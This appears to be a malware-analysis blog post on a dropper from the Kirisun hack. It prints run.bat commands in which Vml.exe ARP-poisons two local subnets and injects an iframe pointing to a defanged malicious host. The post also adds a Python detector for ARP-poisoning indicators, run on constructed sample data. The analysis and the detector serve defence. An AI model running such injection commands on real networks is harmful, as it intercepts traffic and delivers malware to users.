… by the bad guys unfortunately
When investigating one of the files that was being downloaded by the initial dropper from the Kirisun hack I found something very interesting. I do not know if this is a known technique, but it is new to me. The file I was looking at was the “24.exe” and the reasons for choosing that one were:
- Easy: self-extracting RAR, no encryption and no sandbox detection.
- It was one of the largest files == lot’s of goodies?
After running the self-extracting RAR in the sandbox I ended up with the following files in c:\windows\system32\:

Inside the “drivers” folder a copy of npf.sys was dropped. This file belongs to the WinPcap project, as do some of the other files that were extracted.
The file that was supposed to auto start after decompression was “3.vbs” whose only job was to silently run “run.bat” which contained the following two lines:
Vml.exe -idx 0 -ip 192.168.0.1-192.168.0.254 -port 80 -insert “<iframe src=’hxxp://5.xqhgm.com/2.htm’ width=20 height=1></iframe>”
Vml.exe -idx 0 -ip 192.168.1.1-192.168.1.254 -port 80 -insert “<iframe src=’hxxp://5.xqhgm.com/2.htm’ width=20 height=1></iframe>”
exit
Ok, then what does our little friend Vml.exe do with these parameters, I thought? After asking my friend Google I got the answer that I thought I would get: it was performing ARP poisoning on the local network (well, just the two subnets specified in the .bat) and inserting iframes into all websites being viewed. Previously discovered by CISRT earlier in November.
Genius! One point to the bad guys!
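An ARP-poisoning run like the one in run.bat, where one machine answers for every address in a /24 so that HTTP traffic flows through it, leaves two obvious traces on the network: a single MAC address that claims many IPs, and known hosts (the gateway in particular) whose MAC suddenly changes. The small detector below is an added example written for this post, not code from the original article or from any of the tools it mentions. It works on a list of observed ARP replies (the sample replies and the `arp -a`-style table are constructed for the example) and the threshold `MAX_IPS_PER_MAC` is an assumed value.

```python
"""Detect ARP-poisoning indicators in observed ARP replies (added example).

Two signals are checked:
  1. one MAC answering for many different IP addresses (subnet-wide spoofing);
  2. an IP whose MAC changes after it was first learned (gateway/victim
     being re-announced with another MAC).
All sample data below is constructed for this example.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    sender_ip: str
    sender_mac: str


# Assumed threshold: a legitimate host rarely answers for more than a few
# IPs (e.g. a router with secondary addresses). Tune for your network.
MAX_IPS_PER_MAC = 3

# Matches entry lines of a Windows "arp -a" table, e.g.
#   "  192.168.0.1           aa-bb-cc-dd-ee-ff     dynamic"
ARP_A_LINE = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+\w+"
)


def parse_arp_table(text):
    """Turn "arp -a" style output into ArpReply records (MACs normalised)."""
    replies = []
    for line in text.splitlines():
        m = ARP_A_LINE.match(line)
        if m:
            mac = m.group(2).lower().replace("-", ":")
            replies.append(ArpReply(m.group(1), mac))
    return replies


def find_mac_claiming_many_ips(replies, threshold=MAX_IPS_PER_MAC):
    """Return {mac: [ips]} for every MAC that answers for more than
    `threshold` distinct IP addresses."""
    ips_by_mac = defaultdict(set)
    for r in replies:
        ips_by_mac[r.sender_mac].add(r.sender_ip)
    return {mac: sorted(ips) for mac, ips in ips_by_mac.items()
            if len(ips) > threshold}


def find_ip_mac_changes(replies):
    """Return (ip, old_mac, new_mac) for each IP whose MAC changed over the
    sequence of replies, in the order the changes were observed."""
    learned = {}
    changes = []
    for r in replies:
        prev = learned.get(r.sender_ip)
        if prev is not None and prev != r.sender_mac:
            changes.append((r.sender_ip, prev, r.sender_mac))
        learned[r.sender_ip] = r.sender_mac
    return changes


# Constructed sniffer-style sequence: a normal gateway and two hosts, then a
# single MAC sweeping the subnet and taking over the gateway address.
SAMPLE_REPLIES = [
    ArpReply("192.168.0.1", "00:11:22:33:44:55"),   # gateway, legitimate
    ArpReply("192.168.0.10", "00:aa:00:aa:00:aa"),
    ArpReply("192.168.0.11", "00:bb:00:bb:00:bb"),
    ArpReply("192.168.0.1", "00:11:22:33:44:55"),   # gateway again, still fine
    ArpReply("192.168.0.1", "aa:bb:cc:dd:ee:ff"),   # gateway re-announced
    ArpReply("192.168.0.2", "aa:bb:cc:dd:ee:ff"),
    ArpReply("192.168.0.3", "aa:bb:cc:dd:ee:ff"),
    ArpReply("192.168.0.4", "aa:bb:cc:dd:ee:ff"),
    ArpReply("192.168.0.5", "aa:bb:cc:dd:ee:ff"),
]

# Constructed "arp -a" snapshot from a victim host (no history, but the
# many-IPs-per-MAC check still fires).
SAMPLE_ARP_A = """\
Interface: 192.168.0.10 --- 0x3
  Internet Address      Physical Address      Type
  192.168.0.1           aa-bb-cc-dd-ee-ff     dynamic
  192.168.0.2           aa-bb-cc-dd-ee-ff     dynamic
  192.168.0.3           aa-bb-cc-dd-ee-ff     dynamic
  192.168.0.4           aa-bb-cc-dd-ee-ff     dynamic
  192.168.0.11          00-bb-00-bb-00-bb     dynamic
"""

if __name__ == "__main__":
    print("MACs claiming many IPs:", find_mac_claiming_many_ips(SAMPLE_REPLIES))
    print("IP->MAC changes:", find_ip_mac_changes(SAMPLE_REPLIES))
    print("From arp -a:", find_mac_claiming_many_ips(parse_arp_table(SAMPLE_ARP_A)))
```

The sequence-based check needs replies captured over time (a sniffer or periodic switch/ARP-table polls); a single `arp -a` snapshot only supports the many-IPs-per-MAC check, which is still enough to catch a subnet-wide sweep like the one run.bat performs.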